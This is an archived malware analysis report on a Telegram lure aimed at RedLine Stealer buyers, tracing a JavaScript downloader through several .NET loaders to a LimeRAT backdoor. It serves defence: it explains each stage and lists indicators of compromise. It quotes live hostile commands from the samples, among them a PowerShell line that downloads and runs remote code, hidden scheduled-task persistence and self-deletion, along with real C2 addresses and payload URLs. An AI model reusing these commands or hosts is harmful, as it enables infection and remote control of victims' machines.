{
	"id": "be2d9808-81f6-4509-b240-49df951ce026",
	"created_at": "2026-04-06T00:17:03.108898Z",
	"updated_at": "2026-04-10T03:21:48.918172Z",
	"deleted_at": null,
	"sha1_hash": "53018c3a9f322d09d671c055d98114529192cd55",
	"title": "LimeRAT Malware Is Used For Targeting Unskilled Threat Actors",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6061393,
	"plain_text": "LimeRAT Malware Is Used For Targeting Unskilled Threat Actors\r\nBy Felipe Tarijon\r\nPublished: 2022-12-13 · Archived: 2026-04-05 20:56:01 UTC\r\nSummary\r\nI received a message on Telegram from an individual as a lure for executing a malicious script that downloads and executes\r\nadditional obfuscated payloads (some of them directly in memory) that achieve persistence in the victim’s machine. The\r\ndisguise chosen was a supposed collection of files exfiltrated from infected computers via RedLine Stealer, a malware-as-a-service threat very popular among threat actors.\r\nAfter analyzing the final-stage payload, it was possible to identify it as a custom variant of the .NET LimeRAT, an open-source Remote Administration Tool publicly available (on GitHub) since at least February 2018.\r\n1. Introduction\r\nIn July 2022, an individual (handle @sqcrxti0n) approached me on Telegram by sending a message written in the Russian\r\nlanguage along with an attached compressed file (wallets-sorted.rar):\r\nFigure 1. Telegram Message\r\nMessage:\r\nПривeт.чeкнeшь лoги?oтдeльнo wallets coбрaл.ceгoдняшниe. трaф cвoй лью c гyглa,фб\r\n(Translation: Hi. Will you check the logs? I collected the wallets separately, today's. I'm driving my own traffic from Google, FB.)\r\nThe message asks for checking logs — related to some collected “wallets” — inside a compressed file. Additionally, it says\r\nthat the traffic was supposedly obtained from Google and Facebook (if the translation is correct):\r\nFigure 2. Message translation\r\nTaking a look at the file, here are some details about it:\r\nFile name: wallets-sorted.rar\r\nMD5: 15537cbd82c7bfa8314a30ddf3a4a092\r\nSHA256: 68e070e00f9cb3eb6311b29d612b9cf6889ce9d78f353f60aa1334285548df85\r\nAfter extraction, it shows many folders named with “US” + [a unique ID] + [a time stamp]:\r\nhttps://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/\r\nPage 1 of 20\n\nFigure 3. wallets-sorted.rar structure\r\nEach folder contains a bunch of fake text files, logs, cookies, supposed cryptocurrency wallets, and more:\r\nFigure 4. 
Fake files\r\nAs an example, the image below shows one of the text files which is related to the RedLine stealer threat:\r\nFigure 5. RedLine Stealer fake log\r\nAs a malware analyst, I once visited a group of Information stealer malware for sale on Telegram for research purposes (I\r\nswear). So, I believe they got my Telegram account from there.\r\nSome of the folders contain the same JS file (same hash) under different names:\r\nFigure 6. Folder containing suspicious files\r\nAnd the Microsoft Word (.docx) files shown above contain only plain text strings:\r\nFigure 7. Fake .docx files contain plain text\r\nFinally, the JS files contain an obfuscated and malicious script downloader which needs to be executed to start the attack.\r\n2. Downloader\r\nNow that we know that the JS file is malicious, let’s start the analysis.\r\nFile details:\r\nFile name: Meta.js\r\nMD5: 202622bcb60388ad2c74981b03763d5d\r\nSHA256: 8ac98edab8a8a2e5b9feeb6c28b2a27b6258d557c0105f087aeeaea995aee2d3\r\nContent:\r\nFigure 8. Malicious JS file content\r\nAfter sanitizing the file, we can see the malicious code more clearly:\r\nnew ActiveXObject(\"shElL.APPLICatION\").ShElLeXECutE(\r\n \"cmd.eXe\",\"Cmd /c cmd /C EcHO POwERsHEll -Ec aQBFAFgAKAAoAG4AZQBXAC0ATwBiAEoARQBDAFQAIAAJAAkACQAgACAACQAgACAAIAAJACAAIAAJA\r\n);\r\nOnce double-clicked by the victim, it will run as follows:\r\n1. Gets executed via the command line:\r\n\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\%username%\\Downloads\\wallets-sorted\\US[1F92332B4E490152BBA08692ABB682A4] [2022-07-\r\n25T00_13_52.6672057]\\FileGrabber\\Users\\Administrator\\Desktop\\Meta.js\"\r\n2. The resulting command will invoke three cmd.exe processes and write a shell command into a “.avi” file. 
It then executes\r\nanother cmd.exe process that executes that file:\r\n\"C:\\Windows\\System32\\cmd.exe\" Cmd /c cmd /C EcHO POwERsHEll -Ec\r\naQBFAFgAKAAoAG4AZQBXAC0ATwBiAEoARQBDAFQAIAAJAAkACQAgACAACQAgACAAIAAJACAAIAAJACAAIAAJAAkAIAAJACAACQAgACAAIAAgACAAIAAJAG4AZQB0AC4AdwBFAG\r\n\u003e\r\n%LOCALAPPDATA%CU666rZi4UOVMoxz6c01t32uua51pznD9fw1Sc7r73Hc4cPU80Ysaj813h6RPH3M.png:OvP4k5Q2Q6Y1AT9mrj1U6eehRxudHKrIAPC9UxQ83pP4iuoP54G\r\n\u0026 cmD - \u003c\r\n%LOCALAPPDATA%CU666rZi4UOVMoxz6c01t32uua51pznD9fw1Sc7r73Hc4cPU80Ysaj813h6RPH3M.png:OvP4k5Q2Q6Y1AT9mrj1U6eehRxudHKrIAPC9UxQ83pP4iuoP54G\r\n3. The executed “.avi” file contains a command that invokes the powershell.exe process and executes a Base64-encoded\r\ncommand:\r\nPOwERsHEll -Ec\r\naQBFAFgAKAAoAG4AZQBXAC0ATwBiAEoARQBDAFQAIAAJAAkACQAgACAACQAgACAAIAAJACAAIAAJACAAIAAJAAkAIAAJACAACQAgACAAIAAgACAAIAAJAG4AZQB0AC4AdwBFAG\r\n4. The Base64-decoded command invokes further code downloaded as a string from a Google Drive URL:\r\niEX((neW-ObJECT net.wEbclIeNt).DownlOADSTRiNG('https://drive.google.com/uc?\r\nid=1cqQkRuSXBKprbe_k9t7g7dOO4v7IvWm6\u0026export=download'))\r\nThe downloaded and executed code is a PowerShell script used in the next phase of the attack.\r\n3. Second-Stage Dropper\r\nThe downloaded code is named with the date from the day after I received the message:\r\nFile name: 26.07.2022\r\nMD5: 8db6a8bc3bef287f02dc0b415218c128\r\nSHA256: b58200945412fbbc371dae652b800741f411183c14b50ce99b2d89675b2e9ae6\r\nFile Type: Malicious Powershell script\r\nThe PowerShell script has a large Base64-encoded string that starts with “TVq”, which decodes to “MZ”. Therefore, the string is a Base64-encoded Microsoft Windows PE file.\r\nFigure 9. Malicious PowerShell script downloaded\r\nAt the end of the script, the string is decoded, written to a file, and the resulting PE file is then executed:\r\nFigure 10. 
End of the PowerShell script\r\n4. Third-Stage Loader\r\nThe PE is a VB.NET file with the following details:\r\nFile Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5: 8fe7e2573a12bee9cdb2b7fd4939987f\r\nSHA256: d8ecd0a1103834cee76de4c9bd90738ebe05fa46f116ebce591d3ef1ea97418e\r\nObservation: It decrypts and executes a payload directly in memory\r\nThe decompiled code contains some interesting strings in its metadata:\r\nFigure 11. .NET PE decompiled code using the dnSpy tool\r\nThe PE’s resources contain many files with encrypted strings, named P0 to P31. Curiously, it also contains some\r\nphotos like the ones below (the United Nations Secretary-General António Guterres and the President of Turkey, Tayyip Erdoğan)\r\nand two photos of a car and a house burning during the fire in Yosemite, California, U.S.:\r\nFigure 12. Malware’s resource image #1\r\nFigure 13. Malware’s resource image #2\r\nThe image above was originally taken by Justin Sullivan, during the fire in Yosemite, California.\r\nFigure 14. Malware’s resource image #3\r\nThe image above was originally taken by a photographer (David Swanson) from Reuters, also during the fire in Yosemite,\r\nCalifornia.\r\nRegarding its components, the malware has many Forms, probably to disguise itself as a legitimate application:\r\nFigure 15. Malware’s components\r\nThe malicious behavior was inserted in Form1. When initialized, it gets the encrypted strings from the resources (P0\r\nthrough P31) and stores them in variables whose names mix characters from different alphabets:\r\nFigure 16. Third-stage - Form 1\r\nThen, all the strings are concatenated into a class property (Line 55):\r\nFigure 17. 
Third-stage - Form 1 - Concatenated strings from its resources\r\nThe resulting encrypted string is over 2 MB:\r\nFigure 18. Encrypted payload\r\nWhen the program is executed, it runs the Form1 class, loading all its properties (including the concatenated encrypted\r\nstrings), and runs a method called NewMethod1, passing a Base64-decoded string obtained by calling another method that\r\nreceives the concatenated string and a string that is used to generate the decryption key.\r\nFigure 19. Payload being decrypted and loaded in memory\r\nNewMethod1 simply returns an Assembly object:\r\nFigure 20. NewMethod1\r\nAnd the method that receives the concatenated encrypted string and the key decrypts it using AES256 in ECB mode:\r\nFigure 21. Decryption function\r\nThe string used to create the key is BE14D8CB and it is hardcoded in the file.\r\nAfter computing the string’s MD5 hash, it takes different parts of the hash bytes and concatenates them to generate the key:\r\nF3D86A7EFF59314543A5018968E194F3D86A7EFF59314543A5018968E194BC00\r\nThe decrypted payload (a VB.NET PE) is then executed directly in memory and is approximately 1.21 MB:\r\nFigure 22. Decrypted payload (Fourth-stage dropper)\r\n5. Fourth-stage Dropper\r\nThe PE is a VB.NET file with the following details:\r\nFile Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5: d0601e4cdf5fcf7e48e82624bfccbbfa\r\nSHA256: 34e16f7c3e743f6d13854d0a8e066bdf64930556c4e6e8fa7c2bb812cc7f29f8\r\nAt this point, the attack starts to get more interesting.\r\nThis payload also has embedded resources like the previous one (Third Stage), but instead of many resources it has only two\r\nencrypted resources:\r\nFigure 23. 
Embedded resources\r\nWhen executed, the payload runs its main function:\r\nFigure 24. Main function overview\r\nNow, let’s analyze what this code does.\r\n1. Tries to connect to https://www.microsoft.com/ and gets the content returned by the page.\r\n2. Executes the first function, which has a name written in Chinese:\r\nFigure 25. First function\r\nThis function starts three cmd.exe processes that run the md (short for makedir) command, creating three folders:\r\nC:\\ProgramData\\KJeporters\r\nC:\\ProgramData\\Sormerprime\\majority\\Somewhat..\r\nC:\\Users\\Roger\\AppData\\Roaming\\Adobe\\Dontrolling\\Wickremesinghe\\UnconventionalIdentity..\r\nThen, it gets the first encrypted resource and uses the same AES 256 (ECB mode) decryption mechanism as the Third-stage\r\npayload. However, it uses the following string to generate the key: \"希是人是太族首管的接金她\". Next, the decrypted\r\ncontent is decoded using Base64 and decompressed via GZIP. Finally, the resulting data is written to the file below:\r\nC:\\ProgramData\\KJeporters\\notepad.exe\r\nFigure 26. Decrypted resource being written into a file\r\nNote: The analysis of the file above can be found in the Fifth-Stage section of this document.\r\nNext, it starts two cmd.exe processes:\r\nFigure 27. Spawning two processes\r\nThe resulting command lines are:\r\n\"cmd\" /c bitsadmin /transfer /download /priority high \"C:\\ProgramData\\KJeporters\\\\notepad.exe\"\r\n\"C:\\ProgramData\\Sormerprime\\majority\\Somewhat..\\\\explorer\"\r\n\"cmd\" /c bitsadmin /transfer /download /priority high \"C:\\ProgramData\\KJeporters\\\\notepad.exe\"\r\n%APPDATA%\\\\\"Adobe\\Dontrolling\\Wickremesinghe\\UnconventionalIdentity..\\\\conhost\"\r\n3. 
Executes the second function, which also has a name written in Chinese.\r\nThis function first tries to connect to https://www.forbes.com/\r\nNext, it creates two folders:\r\nC:\\ProgramData\\Psnflation\r\nC:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Padnesday\\Weather\\Kemonstrated..\r\nThen, it gets the remaining resource and performs the same decryption and decompression process as the previous function, but\r\nsaves the result into a different file, without an extension:\r\nC:\\ProgramData\\Psnflation\\svchost\r\nNote: The malware above is the same one written to C:\\ProgramData\\KJeporters\\notepad.exe. The only\r\ndifference is the icon used by the file.\r\nNext, it executes the following command line:\r\n\"cmd\" /c bitsadmin /transfer /download /priority high \"C:\\ProgramData\\Psnflation\\\\svchost\"\r\n%APPDATA%\\\\\"Microsoft\\Padnesday\\Weather\\Kemonstrated..\\\\mspaint\"\r\nAnd creates scheduled tasks that are executed every hour:\r\n\"cmd\" /c powershell.exe -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -\r\nnoprofile -Command SCHTASKs /create /f /sc minute /mo 60 /tn \"HKeformerprime\" /tr\r\nC:\\Users\\%username%\\AppData\\Roaming\\Adobe\\Dontrolling\\Wickremesinghe\\UnconventionalIdentity..\\\\conhost\r\n\"cmd\" /c powershell.exe -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -\r\nnoprofile -Command SCHTASKs /create /f /sc minute /mo 60 /tn \"Mtancehimself\" /tr\r\nC:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Padnesday\\Weather\\Kemonstrated..\\\\mspaint\r\n4. Checks whether the program is already running by testing whether a Mutex is already in use.\r\n5. 
Executes another function to achieve persistence.\r\nThis function changes the Windows registry by adding the value below to the Shell sub-key as a persistence\r\nmechanism:\r\nFigure 28. Persistence mechanism #1\r\nNext, it also changes the value below to set a specific folder as the Windows Startup default folder, probably as a fallback in\r\ncase the scheduled tasks don’t work:\r\nFigure 29. Persistence mechanism #2\r\nFinally, it executes the command line below, which hides the conhost file and deletes itself:\r\ncmd /c attrib +s +h \"\"Adobe\\Dontrolling\\Wickremesinghe\\UnconventionalIdentity..\\\\conhost\"\" \u0026 ping\r\n1.1.1.1 -n 1 -w \u0026 del \"\"C:\\Users\\%userpofile%\\Desktop\\decrypted-payload.bin\"\"\r\nSince the file that loaded this payload into memory is the Third-Stage Loader, that file is what gets deleted from\r\ndisk, rather than the “decrypted-payload.bin” shown in the command line above.\r\nAfter that, it tries to execute another method that gets two resources to decrypt and execute in memory. However,\r\nthose resources don’t exist in the Third-Stage PE file, raising an exception which is handled by a catch statement that does\r\nnothing.\r\n6. Fifth-Stage Loader\r\nThis malware is the one written to:\r\nC:\\ProgramData\\KJeporters\\notepad.exe\r\nC:\\ProgramData\\Psnflation\\svchost\r\nHere are its details:\r\nFile Type: Microsoft Windows PE, 32-bits, VB.NET\r\nMD5: 10a62030a349651386e0ef66ab7047b9\r\nSHA256: d36f27c55246cdb3f96a386dd67e2ae2503d81d244b42c8fbefd4767832b0df4\r\nThis malware has the same structure as the Third-Stage Dropper, with the same images as resources, but the encrypted\r\nstrings were divided into 33 parts (from P0 to P33) instead of 31 like before.\r\nFigure 30. 
Fifth-stage loader resources\r\nSince the Third-Stage malware was already analyzed above, we can focus on the final-stage payload, which is decrypted and\r\nloaded into memory the same way but using a different string for generating the key.\r\n7. Final Payload\r\nMD5: 5eb53fc58ac0d4b819a162c48898cf77\r\nSHA256: 25cd4aba6b2523b66e7c2fc30b2f573dd2e972ebee8da6c21b991bc8dbca8f36\r\nTimestamp: 2022-07-25 04:29:08\r\nFile Type: Microsoft Windows PE, 32-bits, VB.NET\r\nAfter decompiling the file, we can see that it’s obfuscated, but this time there are no embedded resources:\r\nFigure 31. Final-stage payload\r\nThen, the code execution happens as follows:\r\n1. Creates a Mutex named “GRUZ_TG_26.07.2022”.\r\n2. Checks a boolean property from a class that is set to false. Because of that, an anti-debugging function is not\r\nexecuted.\r\nNevertheless, the anti-debugging function works like this:\r\n1. Gets the value of the base64-encoded Registry key System\\CurrentControlSet\\Services\\Disk\\Enum\\\r\nand checks if it contains any of the values below:\r\n“vmware”\r\n“qemu”\r\n“XP”\r\n2. It tries to load the “SbieDll.dll” DLL using the kernel32.dll LoadLibrary function.\r\n3. Checks if a debugger is active/attached by calling System.Debugger.IsLogging() and\r\nSystem.Debugger.IsAttached.\r\n4. Checks if the %windir%\\vboxhook.dll file exists.\r\nIf it’s being debugged, it executes the base64-encoded (Y21kLmV4ZSAvYyBwaW5nIDAgLW4gMiAmIGRlbCA=)\r\ncommand cmd.exe /c ping 0 -n 2 \u0026 del, which deletes itself from the disk and then terminates its execution.\r\nFigure 32. Final-stage payload’s anti-debugging function\r\n3. Starts a thread that keeps trying to connect to “https://twitter.com/”\r\n4. Starts a second thread that tries to connect to “https://www.instagram.com/”\r\n5. Starts a third thread that runs the malware’s TCP client indefinitely. 
It receives network data and performs several\r\noperations with it.\r\nIt decrypts the network data using the same mechanism (AES256, ECB mode, and the string “1q2w3e4r5t” to\r\ngenerate the key) as the other payloads, splits the content by “|'L'|”, and saves the data into an array.\r\nThe first element of the array is compared to the strings “!PSend”, “!P”, “!CAP”, “CPL”, “IPL”,\r\n“IPLM”, and “!PStart”.\r\n6. Starts a fourth thread that keeps checking if any of the following processes are running:\r\nvmtoolsd.exe\r\nvm3dservice.exe\r\nVMSrvc.exe\r\nVmwareuser.exe\r\nVBoxTray.exe\r\ntaskmgr.exe\r\nprocesshacker.exe\r\nwireshark.exe\r\nprocexp.exe\r\nprocexp64.exe\r\nprocexp64a.exe\r\nAnVir.exe\r\ntcpview.exe\r\nProcessLasso.exe\r\nSvieCtrl.exe\r\nProcessManager.exe\r\napateDNS.exe\r\nnetstat.exe\r\nfilemon.exe\r\nProcess-Explorer-X64.exe\r\nollydbg.exe\r\nhttpdebugger.exe\r\nwindbg.exe\r\n7. Starts a fifth thread that tries to connect to “https://www.microsoft.com/”\r\n8. Starts one last thread that calls a function that checks a value from the Windows Registry:\r\nGets the entry “USB” from the Registry Key HKCU\\Software\\INFECTED_MACHINE_UNIQUE_ID\r\nThe unique ID is generated by using the machine’s ProcessorId, BIOS SerialNumber, BaseBoard\r\nSerialNumber, and the VideoController Name values.\r\nAfter debugging the malware’s execution, I noticed that it frequently uses some properties from the class below:\r\nFigure 33. Malware settings\r\nAs we already know that the MD5 hash (97db1846570837fce6ff62a408f1c26a) of the string (1q2w3e4r5t) is used to build\r\nthe key (97DB1846570837FCE6FF62A408F1C297DB1846570837FCE6FF62A408F1C26A00), we can decrypt all the\r\nstrings found in the class above:\r\n1. EUYS1q8/PTPEPaGTlq0kYIqqJQcFWo8Dw8zcoMeN5g8=\r\nDecrypted: https://www.facebook.com\r\n2. 
opEOMI6losc4TmzstGIEAUTNI7b+AZ1yYlWyNrllh/QS68DSHf35FbaIuHluOvO+\r\nDecrypted: https://pastebin.com/raw/W51ty3Bw\r\nContent returned by the URL: 185.66.84.202:3715\r\n3. ACTYEkqawgkzMJ4GTC+DvdRrSXPgcZPEWb90tnFvvlcG0LiwElg/+eh/wvk/XcNeEzfszi1NzJldWc7QauqerCZ+WRIpSw0BxawIVVZnXXcl1zS4c5osg0WnJlW0EaQu\r\nDecrypted: https://drive.google.com/uc?id=1Yf7N9ARxkPqWjSVI756_KfKW3rhL6Def\u0026export=download\r\nContent returned by the URL: GRUZ_29.05.2022.txt\r\nFile content: 94.23.6.32:39431%\r\n4. HfSbrJXsAuyBNCT6wGuJkmY7DrE5X7cfprQvEYs/jo6r3OlQhxafU46MmOLl351ieeDKaBZK5grc79XWusW2QkRRTPU/McTZIO5PMlxCCeQ=\r\nDecrypted: https://web.opendrive.com/api/v1/download/file.json/ODNfMzE3ODgwMDdf?inline=1\r\nContent returned by the URL: 138.201.81.121:39431\r\nYou can find the CyberChef recipe to decrypt the strings here.\r\nNow we know that this malware is probably a backdoor, a botnet, or a RAT.\r\n8. Malware Family Classification\r\nAfter searching for specific IOCs and strings used by the malware stages during the attack, I found some interesting matches\r\non GitHub pointing to the LimeRAT malware:\r\nFigure 34. LimeRAT evidence\r\nLimeRAT is developed in Visual Basic .NET and contains many built-in modules such as encrypted communication with its\r\nC2, a spreading mechanism via USB drives, anti-VM/analysis techniques, and many additional plugins such as ransomware\r\ncapability, XMR (Monero) mining, DDoS attacks, Crypto Stealing (by changing the cryptocurrency wallet addresses on the\r\nclipboard), and many more:\r\nFigure 35. LimeRAT open-source project on GitHub\r\nMoreover, looking at LimeRAT’s project, there is a class very similar to the settings we saw in the final-stage malware:\r\nFigure 36. 
LimeRAT settings source-code\r\nThe encryption/decryption process is exactly the same:\r\nFigure 37. LimeRAT encryption/decryption code\r\nAs is the mechanism used for generating the unique ID:\r\nFigure 38. LimeRAT UUID generation code\r\nTherefore, the threat actors reused LimeRAT’s publicly available code in different stages of the attack, since it’s very\r\nmodular and easily customizable. They added obfuscation and disguised all payloads, adding legitimate-looking actions such as\r\nconnecting to Google, Twitter, etc. For the C2 communication, they added other legitimate hosts such as Google Drive and OpenDrive\r\nas fallbacks to get the IP:PORT values.\r\nConclusion\r\nThis is an attack that targets people who purchase or are involved with the RedLine Stealer malware-as-a-service threat. The\r\nsocial engineering employed entices the victims with supposedly exfiltrated data that they will probably open,\r\nincluding the malicious script, resulting in the execution of the attack and ultimately launching LimeRAT.\r\nIt was not possible to attribute this attack to any group, so the motivation is unknown. One possibility is that it is strictly\r\nfinancially motivated, as the malware-as-a-service business is rapidly evolving and attracting inexperienced people who\r\nlikely own cryptocurrency and will not call the authorities in case they are attacked — making them perfect targets.\r\nAdditionally, the victims will not submit the decoy file to services like VirusTotal, resulting in a stealthier and more durable\r\ncampaign.\r\nIOCs (Indicators Of Compromise)\r\nFiles\r\n1. 
wallets-sorted.rar\r\nMD5: 15537cbd82c7bfa8314a30ddf3a4a092\r\nSHA256: 68e070e00f9cb3eb6311b29d612b9cf6889ce9d78f353f60aa1334285548df85\r\nDescription: Decoy file sent on Telegram\r\n2. Meta.js\r\nMD5: 202622bcb60388ad2c74981b03763d5d\r\nSHA256: 8ac98edab8a8a2e5b9feeb6c28b2a27b6258d557c0105f087aeeaea995aee2d3\r\nDescription: Downloader\r\n3. 26.07.2022\r\nMD5: 8db6a8bc3bef287f02dc0b415218c128\r\nSHA256: b58200945412fbbc371dae652b800741f411183c14b50ce99b2d89675b2e9ae6\r\nDescription: Malicious Powershell script/Second-Stage Dropper\r\n4. Unnamed\r\nMD5: 8fe7e2573a12bee9cdb2b7fd4939987f\r\nSHA256: d8ecd0a1103834cee76de4c9bd90738ebe05fa46f116ebce591d3ef1ea97418e\r\nDescription: Third-Stage Loader\r\n5. Unnamed\r\nMD5: d0601e4cdf5fcf7e48e82624bfccbbfa\r\nSHA256: 34e16f7c3e743f6d13854d0a8e066bdf64930556c4e6e8fa7c2bb812cc7f29f8\r\nDescription: Fourth-stage Dropper\r\n6. notepad.exe or svchost\r\nMD5: 10a62030a349651386e0ef66ab7047b9\r\nSHA256: d36f27c55246cdb3f96a386dd67e2ae2503d81d244b42c8fbefd4767832b0df4\r\nDescription: Fifth-Stage Loader\r\n7. 
Unnamed\r\nMD5: 5eb53fc58ac0d4b819a162c48898cf77\r\nSHA256: 25cd4aba6b2523b66e7c2fc30b2f573dd2e972ebee8da6c21b991bc8dbca8f36\r\nDescription: Final Payload, LimeRAT\r\nURLs\r\nhttps://drive.google.com/uc?id=1cqQkRuSXBKprbe_k9t7g7dOO4v7IvWm6\u0026export=download\r\nhttps://pastebin.com/raw/W51ty3Bw\r\nhttps://drive.google.com/uc?id=1Yf7N9ARxkPqWjSVI756_KfKW3rhL6Def\u0026export=download\r\nhttps://web.opendrive.com/api/v1/download/file.json/ODNfMzE3ODgwMDdf?inline=1\r\nC2 addresses (IP:PORT)\r\n185.66.84.202:3715\r\n94.23.6.32:39431\r\n138.201.81.121:39431\r\nReferences\r\nhttps://malpedia.caad.fkie.fraunhofer.de/details/win.limerat\r\nhttps://yoroi.company/research/limerat-spreads-in-the-wild/\r\nhttps://github.com/NYAN-x-CAT/Lime-RAT/\r\nhttps://www.trellix.com/en-us/about/newsroom/stories/research/targeted-attack-on-government-agencies.html\r\nhttps://github.com/search?q=”Y21kLmV4ZSAvYyBwaW5nIDAgLW4gMiAmIGRlbCA%3D”\u0026type=code\r\nSource: https://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/"
	],
	"report_names": [
		"2022-12-12-limerat-infecting-unskilled-threat-actors"
	],
	"threat_actors": [],
	"ts_created_at": 1775434623,
	"ts_updated_at": 1775791308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/53018c3a9f322d09d671c055d98114529192cd55.pdf",
		"text": "https://archive.orkl.eu/53018c3a9f322d09d671c055d98114529192cd55.txt",
		"img": "https://archive.orkl.eu/53018c3a9f322d09d671c055d98114529192cd55.jpg"
	}
}